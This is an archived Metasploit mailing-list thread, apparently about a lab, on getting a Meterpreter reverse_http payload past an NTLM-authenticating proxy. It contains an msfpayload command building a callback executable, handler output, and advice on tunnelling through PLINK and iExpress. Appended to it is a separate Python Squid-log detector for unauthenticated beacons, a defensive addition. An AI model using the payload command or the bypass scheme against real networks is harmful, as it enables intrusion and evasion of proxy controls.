Metasploit mailing list archives
Re: meterpreter ntlm proxy bypass
From: audio audience <audience099 () gmail com>
Date: Fri, 13 Apr 2012 21:58:34 +0300
Thanks for the answer. First of all, can meterpreter access a basic-authentication proxy? Then, I changed my network lab. I set up an MS TMG server and enabled integrated auth. If a computer is joined to Active Directory, it can access the internet over TMG. I ran the meterpreter reverse_http payload; meterpreter automatically connects to the proxy IP and port and sends its HTTP request, but it doesn't complete NTLM auth, and TMG blocked this request. I saw the meterpreter traffic via Wireshark; MS TMG blocked meterpreter's HTTP traffic:

    GET http://x.y.z.t/8YyR HTTP/1.0
    Host: x.y.z.t
    Pragma: no-cache

    HTTP/1.1 407 Proxy Authentication Required ( Forefront TMG requires authorization to fulfill the request. Access to the Web Proxy filter is denied. )
    Via: 1.1 WIN-1ADVF
    Proxy-Authenticate: Negotiate
    Proxy-Authenticate: Kerberos
    Proxy-Authenticate: NTLM
    Proxy-Authenticate: Digest qop="auth",algorithm=MD5-sess,nonce="+Upgraded+xh2sa123da14de32b881d8f64c125075a269ad11f1acd019f21333a41c0025df240d348959c41028a80443ef67b52380888306094e49f99",charset=utf-8,realm=" xyz.com"
    Connection: Keep-Alive
    Proxy-Connection: Keep-Alive
    Pragma: no-cache
    Cache-Control: no-cache
    Content-Type: text/html
    Content-Length: 4128

Do you have any idea on this subject ...

2012/4/11 Sherif El-Deeb <archeldeeb () gmail com>
If the logged-in user already is a member of the domain, is allowed internet access, and the machine is joined to the domain, then reverse_http SHOULD go through the system-configured proxy even with NTLM auth, no problem (thanks HD & Mubix!) ... (if you meet that criteria already, try setting the LPORT at the multi/handler to 80, since that might be the only port allowed). However, if the logged-in user is not allowed an internet connection, or the machine is not a member of the domain (i.e. every time you connect to the internet it pops up asking for creds), you have to have the following:

1- You have to know the username, password and domain of an allowed-internet user.
2- The proxy IP and port.
3- You have to bundle "meterpreter" with an "NTLM-auth-proxy-aware" program to tunnel through the connection for you; a tested-and-guaranteed example would be (SSH server listening on 443) + (PLINK with the -L switch) + (meterpreter with LHOST set to 127.0.0.1) + (some command-line kung-fu to add the host SSH key and glue everything together) + iExpress.

As far as I know, there's nothing built-in that allows you to specify a username, pass, domain and the proxy:port to meterpreter :) I think I'll write a blog post about this someday :) but please beware that you have to know lots of things in advance to make this work.

Sherif Eldeeb

On Wed, Apr 11, 2012 at 10:49 PM, audio audience <audience099 () gmail com> wrote:

Hello Everyone, I want to bypass an NTLM-supported proxy with meterpreter. I tested it in my lab; all outgoing traffic is blocked by the firewall for the client. If the client wants to access the internet, it needs to set a Windows username and password on the NTLM auth proxy.
I created the meterpreter payload with the following options:

    # msfpayload windows/meterpreter/reverse_http LHOST=x.y.z.t LPORT=8080 AutoRunScript='migrate2 iexplore.exe' X > /var/www/8.exe

For listening mode:

    msf exploit(handler) > show options

    Module options (exploit/multi/handler):

       Name  Current Setting  Required  Description
       ----  ---------------  --------  -----------

    Payload options (windows/meterpreter/reverse_http):

       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  process          yes       Exit technique: seh, thread, process, none
       LHOST     x.y.z.t          yes       The local listener hostname
       LPORT     8080             yes       The local listener port

    Exploit target:

       Id  Name
       --  ----
       0   Wildcard Target

    msf exploit(handler) > exploit
    [*] Started HTTP reverse handler on http://x.y.z.t:8080/
    [*] Starting the payload handler...

And then I ran 8.exe on the victim computer, but the proxy blocked the meterpreter HTTP connection, because meterpreter didn't complete NTLM auth. Squid log:

    1334171617.857 0 a.b.c.d TCP_DENIED/407 1744 GET http://x.y.z.t:8080/l2eY - NONE/- text/html

How can I bypass NTLM auth with the meterpreter payload? Thanks for your support.

_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
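A defender's counterpart to the Squid line quoted in the thread, added here as an example (not code from the thread or from Metasploit): it parses Squid native access.log lines and reports clients that keep hitting the same URL and never get past the proxy's 407 challenge, which is what an agent that cannot complete NTLM looks like from the proxy side. The log lines, the 198.51.100.x/203.0.113.x addresses and the function names are constructed for this example.

```python
import re
from collections import defaultdict
from ipaddress import ip_address

# Squid native access.log layout, one request per line:
#   time elapsed client action/status bytes method url user hierarchy/peer type
LINE_RE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+\d+\s+(?P<client>\S+)\s+(?P<action>\w+)/(?P<status>\d{3})\s+\d+\s+"
    r"(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<user>\S+)\s+\S+\s+\S+$")
URL_RE = re.compile(r"^https?://(?P<host>[^/:]+)(?::(?P<port>\d+))?(?P<path>/[^?]*)?")

# Constructed sample modelled on the Squid line quoted in the thread.
# 198.51.100.x / 203.0.113.x are documentation addresses, not real hosts.
SAMPLE_LOG = """\
1334171617.857 0 198.51.100.23 TCP_DENIED/407 1744 GET http://203.0.113.5:8080/l2eY - NONE/- text/html
1334171618.901 0 198.51.100.23 TCP_DENIED/407 1744 GET http://203.0.113.5:8080/l2eY - NONE/- text/html
1334171619.950 0 198.51.100.23 TCP_DENIED/407 1744 GET http://203.0.113.5:8080/l2eY - NONE/- text/html
1334171630.100 0 198.51.100.42 TCP_DENIED/407 1744 GET http://www.example.com/ - NONE/- text/html
1334171630.250 120 198.51.100.42 TCP_MISS/200 5120 GET http://www.example.com/ CORP\\alice HIER_DIRECT/203.0.113.80 text/html
"""

def parse_line(line):
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None

def is_ip(host):
    try:
        ip_address(host)
        return True
    except ValueError:
        return False

def find_unauthenticated_beacons(log_text, min_denials=3):
    # A lone 407 is the normal first leg of an NTLM/Negotiate handshake, so report
    # only clients that keep hitting one URL and never get past the challenge.
    by_key = defaultdict(list)
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec:
            by_key[(rec["client"], rec["url"])].append(rec)
    findings = []
    for (client, url), recs in by_key.items():
        if len(recs) < min_denials or any(r["status"] != "407" for r in recs):
            continue
        u = URL_RE.match(url)
        host, port, path = u["host"], u["port"] or "80", u["path"] or "/"
        # Raw-IP destination, non-standard port, short opaque path: a stronger hint.
        opaque = is_ip(host) and port not in ("80", "443") and 1 <= len(path) - 1 <= 8
        findings.append({"client": client, "url": url, "denials": len(recs), "opaque_destination": opaque})
    return findings
```

The user in the thread would see the 198.51.100.23 group reported, while the www.example.com client is skipped because its 407 was followed by a successful 200 once authentication completed.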
Current thread:
- meterpreter ntlm proxy bypass audio audience (Apr 11)
- Re: meterpreter ntlm proxy bypass Sherif El-Deeb (Apr 11)
- Re: meterpreter ntlm proxy bypass Adrián Puente Z. (Apr 12)
- Re: meterpreter ntlm proxy bypass audio audience (Apr 13)
- Re: meterpreter ntlm proxy bypass Sherif El-Deeb (Apr 13)
- Re: meterpreter ntlm proxy bypass Sherif El-Deeb (Apr 11)